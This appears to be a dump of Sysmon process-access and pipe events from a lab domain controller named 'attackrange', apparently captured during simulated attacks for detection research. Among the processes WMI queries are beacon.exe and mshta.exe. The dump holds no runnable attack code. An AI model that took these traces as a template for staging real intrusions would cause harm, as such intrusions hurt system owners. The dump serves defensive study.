10341000x80000000000000002238730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002238720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.513{05ADC7E1-6D98-603E-99AA-00000000AD01}11584\PSHost.132591776243716840.11584.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002238719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76E637DC83D251B8F93BF20F3D25CD16,SHA256=944F3E536CDD57052331462D3C9225CF94BE3821F404955B9FE5C287EB78DB49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.513{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 